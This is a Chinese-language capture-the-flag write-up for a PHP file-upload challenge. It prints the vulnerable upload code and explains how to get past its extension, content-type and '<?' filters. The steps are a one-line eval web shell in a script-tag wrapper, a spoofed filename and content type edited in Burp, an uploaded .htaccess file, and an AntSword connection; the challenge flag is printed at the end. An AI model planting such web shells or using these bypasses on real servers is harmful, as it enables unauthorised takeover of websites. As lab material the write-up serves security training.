1.進入原始檔開始看看
<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上傳檔案<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上傳\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
$_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
$target_path = getcwd() . "/upload/" . md5($_SESSION['user']);
$t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
$uploaded_tmp = $_FILES['uploaded']['tmp_name'];
if(preg_match("/ph/i", strtolower($uploaded_ext))){
die("字尾名不能有ph!");
}
else{
if ((($_FILES["uploaded"]["type"] == "
") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
$content = file_get_contents($uploaded_tmp);
if(preg_match("/\<\?/i", $content)){
die("誒,別蒙我啊,這標誌明顯還是php啊");
}
else{
mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
move_uploaded_file($uploaded_tmp, $t_path);
echo "{$t_path} succesfully uploaded!";
}
}
else{
die("上傳型別也太露骨了吧!");
}
}
}
?>
發現:
(1)限制了檔案字尾,不能出現"ph"
(2)content-type必須為:"image/jpeg" 、"image/pjpeg"
(3)檔案記憶體不能出現"/<?/i"等字元
2.使用<script></script>將一句話木馬包裹後再進行上傳,上傳過程中在抓包發給bp修改filename為".jpg" ,content-type修改為"image/jpeg"(上傳成功)
一句話木馬:
<script language='php'>eval($_POST[a]);</script>
3.上傳 .htaccess 檔案(content-type 同樣改成"image/jpeg")--->回到第二步的repeater將filename從"2.jpg"修改成"abc"後再次上傳
4.將上傳後的地址加上URL組合,在蟻劍登入伺服器--->flag就在檔案根目錄
FLAG:flag{057d2c48-8926-49d2-893f-26ed50089d47}